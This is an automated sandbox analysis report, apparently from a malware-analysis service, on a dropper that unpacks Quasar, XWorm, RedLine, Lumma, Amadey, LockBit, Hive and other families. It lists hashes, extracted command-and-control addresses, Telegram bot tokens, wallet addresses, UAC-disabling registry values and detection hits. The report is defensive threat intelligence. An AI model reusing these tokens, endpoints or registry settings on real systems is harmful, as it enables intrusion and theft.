Resubmissions
12-12-2024 18:20
241212-wy4dxsvkcp 1012-12-2024 18:03
241212-wnfvwatqgp 1028-11-2024 00:38
241128-ay5fbstmfp 10Analysis
-
max time kernel
130s -
max time network
301s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12-12-2024 18:20
Static task
static1
Behavioral task
behavioral1
Sample
Downloaders.zip
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
4363463463464363463463463.zip
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
4363463463464363463463463.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral4
Sample
New Text Document mod.exse.zip
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
New Text Document mod.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral6
Sample
New Text Document mod.exe
Resource
win10v2004-20241007-en
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
quasar
1.4.1
Office04
14.243.221.170:2654
a7b38fdd-192e-4e47-b9ba-ca9eb81cc7bd
-
encryption_key
8B9AD736E943A06EAF1321AD479071E83805704C
-
install_name
Runtime Broker.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Runtime Broker
-
subdirectory
SubDir
Extracted
xworm
193.233.255.106:69
-
Install_directory
%AppData%
-
install_file
System.exe
-
telegram
https://api.telegram.org/bot7678901257:AAENkDGBF25IbXLdzfMeaD-OMDGJWC2_KRQ/sendMessage?chat_id=7813784541
Extracted
phorphiex
http://185.215.113.66/
http://91.202.233.141/
0xCa90599132C4D88907Bd8E046540284aa468a035
TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6
qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
XryzFMFVpDUvU7famUGf214EXD3xNUSmQf
rsXCXBf9SagxV8JfC12d8Bybk84oPdMNN9
AULzfBuUAPfCGAXoG5Vq14aP9s6fx3AH4Z
LdgchXq1sKbAaAJ1EXAPSRBzLb8jnTZstT
MP8GEm8QpYgQYaMo8oM5NQhRBgDGiLZW5Q
4AtjkCVKbtEC3UEN77SQHuH9i1XkzNiRi5VCbA2XGsJh46nJSXfGQn4GjLuupCqmC57Lo7LvKmFUyRfhtJSvKvuw3h9ReKK
15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC
1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK
ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp
3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc
3ESHude8zUHksQg1h6hHmzY79BS36L91Yn
DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA
t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh
stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj
bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2
bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr
bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd
GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3
bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
-
mutex
753f85d83d
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Extracted
phorphiex
http://185.215.113.84
Extracted
quasar
1.4.0
Office04
192.168.31.99:4782
2001:4bc9:1f98:a4e::676:4782
255.255.255.0:4782
fe80::cabf:4cff:fe84:9572%17:4782
1f65a787-81b8-4955-95e4-b7751e10cd50
-
encryption_key
A0B82A50BBC49EC084E3E53A9E34DF58BD7050B9
-
install_name
Neverlose Loader.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Java Updater
-
subdirectory
SubDir
Extracted
gurcu
https://api.telegram.org/bot7617703274:AAFEXxgPRP1fZGT5UCjcRV4hUZdtNFxyusQ/sendMessage?chat_id=-4568449403
http://209.38.221.184:8080
http://46.235.26.83:8080
http://147.28.185.29:80
http://206.166.251.4:8080
http://51.159.4.50:8080
http://167.235.70.96:8080
http://194.164.198.113:8080
http://132.145.17.167:9090
https://5.196.181.135:443
http://116.202.101.219:8080
https://185.217.98.121:443
http://185.217.98.121:8080
http://159.203.174.113:8090
http://107.161.20.142:8080
https://192.99.196.191:443
http://65.49.205.24:8080
https://154.9.207.142:443
http://67.230.176.97:8080
http://8.222.143.111:8080
http://8.219.110.16:9999
http://41.87.207.180:9090
http://38.207.174.88:8080
http://185.217.98.121:80
http://18.228.80.130:80
http://168.138.211.88:8099
http://129.151.109.160:8080
http://20.78.55.47:8080
http://8.216.92.21:8080
https://138.2.92.67:443
http://38.60.191.38:80
http://101.126.19.171:80
http://47.96.78.224:8080
http://101.43.160.136:8080
Extracted
vidar
11.3
a21440e9f7223be06be5f5e2f94969c7
https://t.me/asg7rd
https://steamcommunity.com/profiles/76561199794498376
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Extracted
redline
newbundle2
185.215.113.67:15206
Extracted
redline
14082024
185.215.113.67:21405
Extracted
lumma
https://sordid-snaked.cyou/api
https://awake-weaves.cyou/api
https://wrathful-jammy.cyou/api
https://debonairnukk.xyz/api
https://diffuculttan.xyz/api
https://effecterectz.xyz/api
https://deafeninggeh.biz/api
https://immureprech.biz/api
https://tacitglibbr.biz/api
Extracted
xworm
5.0
38.180.203.11:1010
LE5ccvPhTtoUBuJ2
-
install_file
USB.exe
Extracted
quasar
1.4.1
RuntimeBroker
Cmaster-57540.portmap.io:57540:8080
7d0b5d0f-c185-4da8-b709-726d2f58400c
-
encryption_key
6275D618DF6119CEEF062AB381785B6186B8C0EB
-
install_name
RuntimeBroker.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
RuntimeBroker
-
subdirectory
devtun
Extracted
quasar
1.4.0
svhost
151.177.61.79:4782
a148a6d8-1253-4e62-bc5f-c0242dd62e69
-
encryption_key
5BEC1A8BC6F8F695D1337C51454E0B7F3A4FE968
-
install_name
svhost.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
svhost
-
subdirectory
svhost
Extracted
xworm
3.1
camp.zapto.org:7771
-
Install_directory
%AppData%
-
install_file
USB.exe
Extracted
amadey
5.04
4bee07
http://185.215.113.209
-
install_dir
fc9e0aaab7
-
install_file
defnur.exe
-
strings_key
191655f008adc880f91bfc85bc56db54
-
url_paths
/Fru7Nk9/index.php
Extracted
asyncrat
0.5.8
Default
0.tcp.eu.ngrok.io:15174
aNoM7pvDUvoo
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
gurcu
https://api.telegram.org/bot7673498966:AAE8RwQQVWIce7zc1tvOHxg7_EravC7Vqis/sendDocument?chat_id=621271611
https://api.telegram.org/bot7587476277:AAEN7p2yOtrq884E9izAnIDu8WeE8vTqRjY/sendMessag
https://api.telegram.org/bot7678901257:AAENkDGBF25IbXLdzfMeaD-OMDGJWC2_KRQ/sendMessage?chat_id=7813784541
https://api.telegram.org/bot7617703274:AAFEXxgPRP1fZGT5UCjcRV4hUZdtNFxyusQ/sendMessage?chat_id=-4568449403
Extracted
lumma
https://tacitglibbr.biz/api
https://immureprech.biz/api
https://deafeninggeh.biz/api
https://wrathful-jammy.cyou/api
https://awake-weaves.cyou/api
https://sordid-snaked.cyou/api
Signatures
-
Amadey family
-
Asyncrat family
-
Detect Vidar Stealer 3 IoCs
resource yara_rule behavioral3/files/0x0007000000023d35-4418.dat family_vidar_v7 behavioral3/memory/4664-4425-0x0000000000250000-0x0000000000550000-memory.dmp family_vidar_v7 behavioral3/memory/4664-4495-0x0000000000250000-0x0000000000550000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 5 IoCs
resource yara_rule behavioral3/files/0x0009000000023ce0-143.dat family_xworm behavioral3/memory/2180-150-0x0000000000930000-0x0000000000946000-memory.dmp family_xworm behavioral3/memory/2944-4687-0x0000000000400000-0x000000000040E000-memory.dmp family_xworm behavioral3/files/0x000200000001e9c8-4786.dat family_xworm behavioral3/memory/1188-4791-0x0000000000800000-0x0000000000818000-memory.dmp family_xworm -
Detects Go variant of Hive Ransomware 1 IoCs
resource yara_rule behavioral3/memory/5380-4838-0x0000000000F50000-0x00000000011B3000-memory.dmp hive_go -
Gh0st RAT payload 1 IoCs
resource yara_rule behavioral3/memory/6476-32520-0x0000000000400000-0x0000000000508000-memory.dmp family_gh0strat -
Gh0strat family
-
Gurcu family
-
Hive
A ransomware written in Golang first seen in June 2021.
-
Hive family
-
Lockbit
Ransomware family with multiple variants released since late 2019.
-
Lockbit family
-
Lumma family
-
Meduza Stealer payload 2 IoCs
resource yara_rule behavioral3/files/0x0007000000023d60-4918.dat family_meduza behavioral3/files/0x0008000000024117-33176.dat family_meduza -
Meduza family
-
Phorphiex family
-
Phorphiex payload 1 IoCs
resource yara_rule behavioral3/files/0x0007000000023ceb-1275.dat family_phorphiex -
Quasar family
-
Quasar payload 8 IoCs
resource yara_rule behavioral3/files/0x0007000000023cc3-8.dat family_quasar behavioral3/memory/2456-16-0x0000000000470000-0x0000000000794000-memory.dmp family_quasar behavioral3/files/0x0007000000023d11-4267.dat family_quasar behavioral3/memory/4228-4280-0x0000000000B00000-0x0000000000B84000-memory.dmp family_quasar behavioral3/files/0x000300000000070f-4712.dat family_quasar behavioral3/memory/4368-4717-0x00000000002A0000-0x00000000005C4000-memory.dmp family_quasar behavioral3/files/0x000200000001e9c7-4775.dat family_quasar behavioral3/memory/1064-4781-0x00000000000E0000-0x0000000000164000-memory.dmp family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
resource yara_rule behavioral3/files/0x0007000000023d37-4448.dat family_redline behavioral3/memory/4592-4453-0x0000000000E50000-0x0000000000EA2000-memory.dmp family_redline behavioral3/files/0x0008000000023d48-4563.dat family_redline behavioral3/memory/216-4568-0x0000000000CD0000-0x0000000000D22000-memory.dmp family_redline -
Redline family
-
Rule to detect Lockbit 3.0 ransomware Windows payload 1 IoCs
resource yara_rule behavioral3/files/0x0003000000022eb5-4880.dat family_lockbit -
Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
description pid Process procid_target PID 5596 created 3420 5596 3161510603.exe 56 PID 5596 created 3420 5596 3161510603.exe 56 PID 5760 created 3420 5760 winupsecvmgr.exe 56 PID 5760 created 3420 5760 winupsecvmgr.exe 56 PID 5760 created 3420 5760 winupsecvmgr.exe 56 PID 4312 created 3420 4312 conhost.exe 56 PID 4312 created 3420 4312 conhost.exe 56 PID 3272 created 2988 3272 zeropersca.exe 50 PID 4604 created 3420 4604 winupsecvmgr.exe 56 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe -
Vidar family
-
Xworm family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral3/files/0x000800000002412e-33376.dat family_asyncrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ama.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ defnur.exe -
pid Process 1664 powershell.exe 13096 powershell.exe 4556 powershell.exe 2312 powershell.exe 1564 powershell.exe 1516 powershell.exe 4824 powershell.exe 6112 powershell.exe 5924 powershell.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 2884 netsh.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 5752 attrib.exe -
A potential corporate email address has been identified in the URL: vtXV0_Admin@YQRLKYON_report.wsr
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ama.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ama.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion defnur.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion defnur.exe -
Checks computer location settings 2 TTPs 17 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation Amadey.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation kohjaekdfth.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation av_downloader1.1.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation 4363463463464363463463463.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation chrome11.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation 1989129625.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation njrtdhadawt.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation boleto.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation Offnewhere.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation ama.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation XClient.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation bnkrigkawd.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation AV_DOW~1.EXE -
Drops startup file 5 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk XClient.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs ectosphere.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe Powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe Powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk XClient.exe -
Executes dropped EXE 64 IoCs
pid Process 2456 Registry.exe 4852 Runtime Broker.exe 2236 svchost.exe 4312 chrome11.exe 4940 Server1.exe 2724 award.pdf.exe 4560 test14.exe 2180 XClient.exe 3648 pp.exe 2532 305iz8bs.exe 5236 2910514938.exe 6056 sysnldcvmr.exe 1888 Amadeus.exe 5272 1989129625.exe 5620 2309417675.exe 5236 build555.exe 5788 Complexo%20v4.exe 5308 FDR9876567000.exe 4228 Neverlose%20Loader.exe 5216 ectosphere.exe 5712 ectosphere.exe 1012 262965725.exe 3488 steel.exe 2920 bnkrigkawd.exe 4960 steel.tmp 4480 videominimizer32.exe 4056 ControlledAccessPoint.exe 4664 njrtdhadawt.exe 5536 281730318.exe 4592 windowsexecutable.exe 3364 bqkriy6l.exe 5596 3161510603.exe 4492 test26.exe 5508 clip.exe 5304 random.exe 2956 test_again2.exe 216 14082024.exe 5328 Amadey.exe 2112 Hkbsse.exe 1532 System.exe 5760 winupsecvmgr.exe 4724 Setup2.exe 3476 gweadtrgh.exe 4368 RuntimeBroker.exe 2308 RuntimeBroker.exe 5516 AutoUpdate.exe 5184 Offnewhere.exe 3676 Gxtuum.exe 5380 Hive%20Ransomware.exe 1064 svhost.exe 1188 boleto.exe 4716 svhost.exe 1864 RuntimeBroker.exe 4688 ama.exe 3272 zeropersca.exe 4604 winupsecvmgr.exe 5504 defnur.exe 2596 builder.exe 1864 crack.exe 5812 kohjaekdfth.exe 5604 popapoers.exe 3028 av_downloader1.1.exe 4060 tdrpload.exe 8 4434.exe -
Identifies Wine through registry keys 2 TTPs 3 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine ama.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine defnur.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine random.exe -
Loads dropped DLL 3 IoCs
pid Process 4960 steel.tmp 4480 videominimizer32.exe 4664 njrtdhadawt.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 bnkrigkawd.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 bnkrigkawd.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 bnkrigkawd.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 bnkrigkawd.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 bnkrigkawd.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 bnkrigkawd.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 bnkrigkawd.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 bnkrigkawd.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 bnkrigkawd.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" 2910514938.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Roaming\\System.exe" XClient.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\desktop.ini svchost.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 675 0.tcp.eu.ngrok.io 11 raw.githubusercontent.com 12 raw.githubusercontent.com 597 raw.githubusercontent.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 684 api.ipify.org 686 api.ipify.org 144 ip-api.com -
AutoIT Executable 4 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral3/memory/5216-4286-0x00000000004E0000-0x00000000006AE000-memory.dmp autoit_exe behavioral3/memory/5308-4285-0x00000000004B0000-0x000000000067E000-memory.dmp autoit_exe behavioral3/memory/5216-4299-0x00000000004E0000-0x00000000006AE000-memory.dmp autoit_exe behavioral3/memory/5712-4442-0x00000000004E0000-0x00000000006AE000-memory.dmp autoit_exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\system32\devtun\RuntimeBroker.exe RuntimeBroker.exe File opened for modification C:\Windows\system32\devtun\RuntimeBroker.exe RuntimeBroker.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 5304 random.exe 4688 ama.exe 5504 defnur.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 1888 set thread context of 5684 1888 Amadeus.exe 125 PID 4056 set thread context of 5856 4056 ControlledAccessPoint.exe 172 PID 5760 set thread context of 4312 5760 winupsecvmgr.exe 178 PID 5760 set thread context of 4108 5760 winupsecvmgr.exe 179 PID 3364 set thread context of 2944 3364 bqkriy6l.exe 181 PID 8 set thread context of 4688 8 4434.exe 252 -
resource yara_rule behavioral3/files/0x0007000000023d0c-4251.dat upx behavioral3/memory/5308-4257-0x00000000004B0000-0x000000000067E000-memory.dmp upx behavioral3/memory/5216-4286-0x00000000004E0000-0x00000000006AE000-memory.dmp upx behavioral3/memory/5308-4285-0x00000000004B0000-0x000000000067E000-memory.dmp upx behavioral3/memory/5712-4297-0x00000000004E0000-0x00000000006AE000-memory.dmp upx behavioral3/memory/5216-4299-0x00000000004E0000-0x00000000006AE000-memory.dmp upx behavioral3/memory/5712-4442-0x00000000004E0000-0x00000000006AE000-memory.dmp upx behavioral3/files/0x000500000001da9c-4767.dat upx behavioral3/memory/5380-4770-0x0000000000F50000-0x00000000011B3000-memory.dmp upx behavioral3/memory/5380-4838-0x0000000000F50000-0x00000000011B3000-memory.dmp upx -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\Application\chrome.exe chrome11.exe File opened for modification C:\Program Files\Google\Chrome\Application\chrome.exe chrome11.exe -
Drops file in Windows directory 5 IoCs
description ioc Process File created C:\Windows\sysnldcvmr.exe 2910514938.exe File opened for modification C:\Windows\sysnldcvmr.exe 2910514938.exe File created C:\Windows\Tasks\Hkbsse.job Amadey.exe File created C:\Windows\Tasks\Gxtuum.job Offnewhere.exe File created C:\Windows\Tasks\defnur.job ama.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 5168 mshta.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral3/files/0x000a00000002407f-32785.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Program crash 2 IoCs
pid pid_target Process procid_target 5976 5604 WerFault.exe 231 48312 47024 WerFault.exe 320 -
System Location Discovery: System Language Discovery 1 TTPs 53 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Offnewhere.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language defnur.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2309417675.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ectosphere.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 281730318.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fontdrvhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Amadey.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language steel.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language steel.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FDR9876567000.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language windowsexecutable.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ectosphere.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4434.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ama.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2910514938.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language clip.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language popapoers.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language award.pdf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language builder.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kohjaekdfth.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zeropersca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 14082024.exe Key opened 